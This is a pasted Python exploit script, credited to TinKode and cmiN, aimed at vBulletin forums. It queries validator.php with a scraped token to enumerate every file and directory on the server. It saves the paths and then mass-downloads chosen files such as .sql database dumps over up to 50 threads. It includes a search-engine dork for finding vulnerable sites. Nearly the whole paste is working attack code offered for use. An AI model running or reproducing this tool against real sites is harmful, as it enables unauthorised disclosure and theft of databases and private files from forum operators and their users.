[ create a new paste ] login | about

Link: http://codepad.org/pEBTI2dU    [ raw code | fork ]

c0de.breaker - Plain Text, pasted on Jan 24:
#! /usr/bin/env python3.1 
# 
################################################################ 
#                ____        _ _      _   _ (validator.php)    # 
#               |  _ \      | | |    | | (_)                   # 
#         __   _| |_) |_   _| | | ___| |_ _ _ __               # 
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              # 
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             # 
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             # 
#                                   @expl0it...                # 
################################################################ 
#       [ vBulletin Files / Directories Full Disclosure ]      # 
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   # 
#           [ Greetz: insecurity.ro, darkc0de.com ]            # 
################################################################ 
#                                                              # 
#                  Special thanks for: cmiN                    # 
#                  www.TinKode.BayWords.com                    # 
################################################################ 
 
 
import os, sys, urllib.request, urllib.parse, threading 
 
 
def main(): 
    logo = """ 
\t |---------------------------------------------------------------| 
\t |                 ____        _ _      _   _     (TM)           | 
\t |                |  _ \      | | |    | | (_)                   | 
\t |          __   _| |_) |_   _| | | ___| |_ _ _ __               | 
\t |          \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              | 
\t |           \ V /| |_) | |_| | | |  __/ |_| | | | |             | 
\t |            \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             | 
\t |                                                               | 
\t |               vBulletin Full Disclosure expl0it               | 
\t |                      Written by cmiN                          | 
\t |              Vulnerability discovered by TinKode              | 
\t |                                                               | 
\t |              Dork: intext:"Powered by vBulletin"              | 
\t |          Visit: www.insecurity.ro & www.darkc0de.com          | 
\t |---------------------------------------------------------------| 
""" 
    usage = """ 
         |---------------------------------------------------------------| 
         |Usage:  vbfd.py scan http://www.site.com/vB_folder             | 
         |        vbfd.py download *.sql -> all                          | 
         |        vbfd.py download name.jpg -> one                       | 
         |---------------------------------------------------------------|""" 
    if sys.platform in ("linux", "linux2"): 
        clearing = "clear" 
    else: 
        clearing = "cls" 
    os.system(clearing) 
    print(logo) 
    args = sys.argv 
    if len(args) == 3: 
        try: 
            print("Please wait...") 
            if args[1] == "scan": 
                extract_parse_save(args[2].strip("/")) 
            elif args[1] == "download": 
                download_data(args[2]) 
        except Exception as message: 
            print("An error occurred: {}".format(message)) 
        except: 
            print("Unknown error.") 
        else: 
            print("Ready!") 
    else: 
        print(usage) 
    input() 
 
 
def extract_parse_save(url): 
    print("[+]Extracting content...") 
    hurl = url + "/validator.php" 
    with urllib.request.urlopen(hurl) as usock: 
        source = usock.read().decode() 
    print("[+]Finding token...") 
    word = "validate('" 
    source = source[source.index(word) + len(word):] 
    value = source[:source.index("'")] 
    print("[+]Obtaining paths...") 
    hurl = url + "/validator.php?op={}".format(value) 
    with urllib.request.urlopen(hurl) as usock: 
        lastk, lastv = None, None 
        dictionary = dict() 
        for line in usock: 
            line = line.decode() 
            index = line.find("<td>") 
            if index != -1: 
                lastk = line[index + 4:line.index("</td>")].strip(" ") 
            index = line.find("<strong>") 
            if index != -1: 
                lastv = line[index + 8:line.index("</strong>")].strip(" ") 
            if lastk != None and lastv != None: 
                index = lastk.rfind(".") 
                if index in (-1, 0): 
                    lastk = "[other] {}".format(lastk) 
                else: 
                    lastk = "[{}] {}".format(lastk[index + 1:], lastk) 
                dictionary[lastk] = lastv 
                lastk, lastv = None, None 
    print("[+]Organizing and saving paths...") 
    with open("vBlogs.txt", "w") as fout: 
        fout.write(url + "\n") 
        keys = sorted(dictionary.keys()) 
        for key in keys: 
            fout.write("{} ({})\n".format(key, dictionary[key])) 
 
 
def download_data(files): 
    print("[+]Searching and downloading files...") 
    mthreads = 50 
    with open("vBlogs.txt", "r") as fin: 
        url = fin.readline().strip("\n") 
        if files.find("*") == -1: 
            hurl = url + "/" + files.strip("/") 
            Download(hurl).start() 
        else: 
            ext = files[files.rindex(".") + 1:] 
            for line in fin: 
                pieces = line.strip("\n").split(" ") 
                if pieces[0].count(ext) == 1: 
                    upath = pieces[1] 
                    hurl = url + "/" + upath.strip("/") 
                    while threading.active_count() > mthreads: 
                        pass 
                    Download(hurl).start() 
    while threading.active_count() > 1: 
        pass 
 
 
class Download(threading.Thread): 
 
    def __init__(self, url): 
        threading.Thread.__init__(self) 
        self.url = url 
 
    def run(self): 
        try: 
            with urllib.request.urlopen(self.url) as usock: 
                data = usock.read() 
                uparser = urllib.parse.urlparse(usock.geturl()) 
                pieces = uparser.path.split("/") 
                fname = pieces[len(pieces) - 1] 
                with open(fname, "wb") as fout: 
                    fout.write(data) 
        except: 
            pass 
 
 
if __name__ == "__main__": 
    main()


Create a new paste based on this one


Comments: